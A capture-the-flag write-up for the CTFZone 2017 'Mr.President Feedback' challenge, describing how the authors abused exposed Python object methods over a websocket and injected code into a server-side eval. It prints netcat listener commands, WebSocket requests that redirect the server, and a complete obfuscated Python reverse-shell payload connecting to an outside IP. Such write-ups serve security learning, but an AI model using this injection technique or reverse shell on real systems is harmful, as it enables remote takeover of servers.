MrPresidentFeedback -- CTFZone 2017
Mr.President Feedback #Web/Pwn #CodeInjection #python #shell
By: Diogo, Filipe, Vasco and João
Description:
31 solves, 460 points
One of the candidates has just launched feedback form for the electors. We need to analyze data from that server to gain advantage at upcoming debates. If you get sensitive data, we will pay a lot. Feedback form->website
The website consisted of a webclient that make requests with a websocket to a server and a fake submit method.
In the websockets message we could see the messages sent to the server:
{"method":"generate"}
and
{"method":"check","args":["1872b9691b5675183546f11b133aa30a","chaptaSolution"]}
Exposed Object methods
After this we tried to find more methods.
If we send {"method": "__dir__"}
we get a list of all attributes and methods as you can see below (received methods and attributes):
"_port",
"_table",
"_sock",
"__module__",
"_last",
"__init__",
"reconnect",
"operations",
"generate",
"check",
"help",
"__dict__",
"__weakref__",
"__doc__",
"__repr__",
"__hash__",
"__str__",
"__getattribute__",
"__setattr__",
"__delattr__",
"__lt__",
"__le__",
"__eq__",
"__ne__",
"__gt__",
"__ge__",
"__new__",
"__reduce_ex__",
"__reduce__",
"__subclasshook__",
"__init_subclass__",
"__format__",
"__sizeof__",
"__dir__",
"__class__"]
Abusing exposed methods
With method ` setattr we could change ip and port of our server, then we request to reconnect and we have it binded to our server.<br>
When we request
{“method”:”generate”}` to the server it will ask to our server the available operations splited by spaces. When we send the existing operations the server makes someting like:
eval("1 "+rand(operationsReceived)+"2")
and asks us to make the chapa for that operation. In the eval
we could inject code by sending it like an operation. Notice however that the code can’t have spaces because that is what is used to split the possible operations.
EXPLOIT
- PREPARE OPERATIONS SERVER:
-
Get IP:
>curl -s checkip.dyndns.org
-
Run Netcat Listener:
> nc -l -p 22222
-
- PREPARE REVERSE SHELL SERVER:
-
Get IP:
>curl -s checkip.dyndns.org
-
Run Netcat Listener:
> nc -l -p 9999
-
- Use exposed methods to change destination server with WebSocket Requests:
{"method":"__setattr__", "args":["_port",22222]}
{"method":"__setattr__", "args":["_server","193.136.128.103"]}
{"method":"reconnect"}
{"method":"generate"}
- When we receive
supported_operations
in port22222
we send our reverse shell that is going to be executed ineval
:+__import__('subprocess').call(['python','-c','import'+chr(32)+'socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('+chr(34)+'193.136.128.108'+chr(34)+',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['+chr(34)+'/bin/sh'+chr(34)+','+chr(34)+'-i'+chr(34)+']);'])#
- Send something in
22222
: